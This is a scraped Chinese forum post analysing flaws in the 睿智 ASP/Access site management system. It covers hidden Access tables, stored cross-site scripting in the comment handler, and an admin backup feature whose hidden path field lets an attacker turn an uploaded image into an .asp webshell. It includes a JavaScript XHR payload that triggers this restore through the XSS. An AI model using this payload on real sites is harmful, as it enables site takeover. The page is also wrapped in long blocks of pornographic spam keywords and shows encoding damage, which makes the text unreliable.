久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区


曙海教育集團論壇開發語言培訓專區SQL Server數據庫 → 利用or構造SQL巧妙注射-分析睿智管理系統安全


  共有7693人關注過本帖樹形打印

主題:利用or構造SQL巧妙注射-分析睿智管理系統安全

美女呀,離線,留言給我吧!
wangxinxin
  1樓 個性首頁 | 博客 | 信息 | 搜索 | 郵箱 | 主頁 | UC


加好友 發短信
等級:青蜂俠 帖子:1393 積分:14038 威望:0 精華:0 注冊:2010-11-12 11:08:23
利用or構造SQL巧妙注射-分析睿智管理系統安全  發帖心情 Post By:2010-12-13 13:47:46

前言:
???? 最近上cnzz下載了一套網站管理系統,在源碼首頁發現它,心想cnzz都推薦應該安全性相當不錯了.官方下載最新版本本地搭建IIS測試發現簡潔易用,整體上安全做得不錯.由于是免費版的,可能官方有點放水.不過這里不影響我們的分析,這里討論兩個方面:跨站的利用,SQL注射.還是一句話:重在思路.
一.隱藏的數據庫
分析代碼經常要用到數據庫(我分析的是Access版本的) ,習慣性的打開數據庫,驚奇的發現只有一個notdown表,如圖01:
  
可是再仔細查看代碼發現不應該只有這張表的,于是就想是不是隱藏起來了?第一次看到這種情況,于是就查看了下Access幫助說明,在其中發現原來有還存在兩種屬性的數據表,即系統對象和隱藏對象.下面做一個小知識補充:
由于Access默認是不顯示系統對象和隱藏對象的.所以如果一個表中存在隱藏對象或者系統對象那么就無法看到該表了. 簡單說下隱藏方法,設計好表后右擊表選擇"屬性"->"隱藏"屬性打勾,刷新下就看不到了,這樣就是隱藏對象了,默認是看不到的.至于系統對象,我們可以修改表的前綴為 usys,這樣就可以把表改成一個系統對象.這兩種方法都可以.
既然可以隱藏當然也可以恢復顯示了, 按如下操作:“工具”菜單->“選項”命令->“視圖”選項卡->選中“顯示”一欄下的“系統對象”復選框或者"隱藏對象"復選框,并按下“確定”按鈕,就可以重新顯示所有表了.如圖02
  
Ok了,數據就可以和正常的一樣了.
二.跨站的深入利用雞肋
首先看看漏洞文件/include/PlS.asp,查看代碼發現是一個評論顯示,在多個文件被包含了,代碼如下:  
"" then
??????Dim Author,Content,mycode
????Author=Trim(Request.Form("Author"))// 簡單的過濾空格
????Content=Trim(Request.Form("Content")) //同上
????mycode = trim(request.form("code"))
??????if Author="" or Content="" then
??????Call Alert ("請填寫完整再提交","-1")
????end if
????if mycodeSession("getcode") then
?????? Call Alert ("您輸入驗證碼錯誤","-1")
????end if
??????set rs = server.CreateObject ("adodb.recordset")
????sql="select * from zhi_rui_E_Pl"
????rs.open sql,conn,1,3
????rs.addnew
????rs("cli")=Request.Form("cli")
????rs("Ioid")=request.Form("Inid")
????rs("Author")=Author
????rs("Content")=Content
??------------------------省略部分代碼-------------------------------
%>

顯然沒有任何過濾,直接寫入數據庫,跨站產生了.由于數據庫是mdb格式的,所有插馬也沒用.這里就想到了是否可以備份數據庫?進入后臺看到數據庫備份,查看如圖03:
  
看到了沒,據庫路徑和備份文件名都不能修改,有些朋友可能就到這里停止,其實不然,還可以繼續,經驗告訴我,他是將該輸入框寫成hidden隱藏域了,查看文件/admin/Admin_Data.asp代碼如下:  
" size="40" />[/td]

看到這行type=hidden,猜測沒錯.那也就是說同樣可以備份任意文件了.所有后臺拿shell比較簡單了.(插馬備份數據庫比較麻煩,要繞過// 判斷瀏覽器類型并定義創建xmlhttp會話
if (window.XMLHttpRequest)
{
??xmlhttp = new XMLHttpRequest();
} else if (window.ActiveXObject)
{
??try
??{
????xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
??}
??catch (e)
??{
????try
????{
??????xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
????}
????catch (e)
????{
????}
??}
}
function backup()
{
??var postStr = "DBpath=upload/2009082150598817.jpg&bkfolder=../DataBase/bak/&bkDBname=l4nk0r.asp";
??xmlhttp.open(&quot圖片點擊可在新窗口打開查看OST","/admin/Admin_data.asp?action=RestoreData&act=Restore",true);
??xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
??xmlhttp.send(postStr);
}
Backup();

然后在你要提交的地方提交

支持(0中立(0反對(0單帖管理 | 引用 | 回復 回到頂部

返回版面帖子列表

利用or構造SQL巧妙注射-分析睿智管理系統安全








簽名
久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区
波多野结衣91| 看电影不卡的网站| 精品久久人人做人人爽| 91.成人天堂一区| 日韩视频中午一区| 精品少妇一区二区三区 | 影音先锋欧美在线| 一区二区三区欧美在线| 一区二区不卡在线| 91福利区一区二区三区| 欧美日韩国产首页| 国产精品乡下勾搭老头1| 国产精品一区二区在线观看网站| 国产高清精品网站| 成人永久免费| 在线综合视频网站| 91精品在线麻豆| 久久网这里都是精品| 最新欧美精品一区二区三区| 亚洲国产成人av好男人在线观看| 天天综合日日夜夜精品| 国产永久精品大片wwwapp| 99久久亚洲一区二区三区青草| 久久久com| 欧美日韩成人综合| 欧美韩国日本不卡| 亚洲午夜精品在线| 国产一区二区三区av电影 | 国产精品情趣视频| 亚洲一区二区三区四区在线观看| 首页综合国产亚洲丝袜| 国产精品中文欧美| 精品国产一区二区三区麻豆免费观看完整版 | 国精产品一区一区三区mba视频| av一区二区三区黑人| 免费亚洲一区二区| 欧美亚洲高清一区二区三区不卡| 日韩欧美中文一区| 亚洲一区二区美女| 成人中文字幕合集| 欧美午夜精品理论片a级大开眼界| 色网综合在线观看| 日本一区二区在线不卡| 亚洲成人综合视频| av福利精品导航| 一本久道久久综合| 国产亚洲福利社区一区| 免费高清成人在线| 国产精品视频一区二区三区经| 一本到三区不卡视频| 久久久www免费人成精品| 日本伊人色综合网| 国产亚洲一区二区三区在线播放| 精品视频免费在线| 亚洲激情成人在线| 99久久99久久精品免费看蜜桃| 日韩免费三级| 国产日韩欧美精品综合| 国产在线视视频有精品| 欧美一区二区高清在线观看| 日韩欧美一二区| 日韩激情中文字幕| 精品国产中文字幕| 精品国产一区二区在线观看| 蜜桃精品视频在线观看| 欧美激情www| 国产喷白浆一区二区三区| 经典一区二区三区| 亚洲高清不卡一区| 中文在线免费一区三区高中清不卡| 九九视频精品免费| 亚洲精品第一区二区三区| 国产精品久久久久久久久免费樱桃| 国产精品一区在线观看乱码| 一区二区在线高清视频| 亚洲美女精品一区| 国产精品一区二区三区在线| 国产精品中文字幕欧美| 午夜精品福利一区二区| 亚洲天堂成人在线观看| 91免费看蜜桃| 久久综合色8888| 国产成人精品一区二| 欧美人动与zoxxxx乱| 天堂一区二区在线免费观看| 亚洲精品久久区二区三区蜜桃臀 | 国产色产综合产在线视频| 成人av集中营| 欧美刺激午夜性久久久久久久| 青青草97国产精品免费观看 | 日韩av一区二区三区四区| 欧美日韩国产一二| 亚洲欧美日韩国产综合在线 | 一区二区免费电影| 一区二区高清免费观看影视大全 | 337p日本欧洲亚洲大胆精品| 国产精品一区二区无线| 欧美精品丝袜久久久中文字幕| 日韩精品欧美成人高清一区二区| 午夜精品美女久久久久av福利| 一区二区三区精品视频在线| 欧美一区视久久| 一区二区在线观看视频| 欧美一区二区在线视频观看| 夜夜揉揉日日人人青青一国产精品| 欧美不卡福利| 洋洋av久久久久久久一区| 欧美一二三四五区| 午夜欧美2019年伦理| 一本大道久久精品懂色aⅴ| 日韩av在线播放中文字幕| 欧美性猛交一区二区三区精品| 久草热8精品视频在线观看| 欧美美女一区二区在线观看| 国产在线不卡一卡二卡三卡四卡| 91精品欧美久久久久久动漫| 成人高清视频在线观看| 国产日产欧美一区二区视频| 欧美男人的天堂| 奇米亚洲午夜久久精品| 欧美伊人精品成人久久综合97| 国产一区二区女| 久久蜜桃香蕉精品一区二区三区| 国产精品v欧美精品v日韩| 亚洲欧美偷拍三级| 中文字幕欧美人与畜| 国产中文字幕精品| 久久综合九色综合欧美亚洲| 精品一区二区日本| 亚洲电影一区二区三区| 欧美日韩一区 二区 三区 久久精品| 国产一本一道久久香蕉| 亚洲国产精华液网站w| 亚洲精品一区二区三区av| 久久国产剧场电影| xnxx国产精品| 日韩在线观看电影完整版高清免费| 青青草原综合久久大伊人精品优势| 91精品国产综合久久久蜜臀粉嫩 | 99视频国产精品免费观看| 亚洲欧美韩国综合色| 欧美亚洲愉拍一区二区| 91麻豆视频网站| 亚洲国产va精品久久久不卡综合| 欧美日免费三级在线| 91久久伊人青青碰碰婷婷| 亚洲国产精品一区二区久久 | 91精品欧美久久久久久动漫| 999国内精品视频在线| 亚洲风情在线资源站| 欧美一二三四在线| 奇米影视首页 狠狠色丁香婷婷久久综合 | 91在线观看高清| 亚洲影院久久精品| 欧美丰满嫩嫩电影| 欧美aaaaa喷水| 国产成人午夜精品5599| 亚洲精品视频观看| 日韩一区二区电影网| 日本在线视频不卡| 99在线视频精品| 日本va欧美va瓶| 国产精品蜜臀av| 91精品国产综合久久精品麻豆 | 欧美午夜在线一二页| 国产精品国产一区二区| 美国一区二区三区在线播放| 亚洲国产精品ⅴa在线观看| 欧美午夜精品理论片a级按摩| 国产在线精品一区二区三区》| 国内久久婷婷综合| 亚洲综合在线五月| 久久精品一区二区三区四区| 欧美日韩国产首页在线观看| 日韩精品久久一区| 福利视频一区二区三区| 国精产品一区一区三区mba桃花| 一级做a爱片久久| 久久久精品影视| 欧美日韩亚洲不卡| 午夜精品一区二区在线观看的| 91网站黄www| 国产精品系列在线播放| 青青草伊人久久| 一区二区免费在线播放| 国产精品色噜噜| 精品美女在线观看| 欧美福利视频一区| 一本到三区不卡视频| 日本视频一区二区不卡| 久久99欧美| 国产精品久久亚洲| 波多野结衣视频一区| 激情小说欧美图片| 日本免费在线视频不卡一不卡二| 国产精品成人在线观看| 久久精品日韩一区二区三区| 日韩免费电影一区| 欧美一区二区免费视频| 91精品免费在线观看|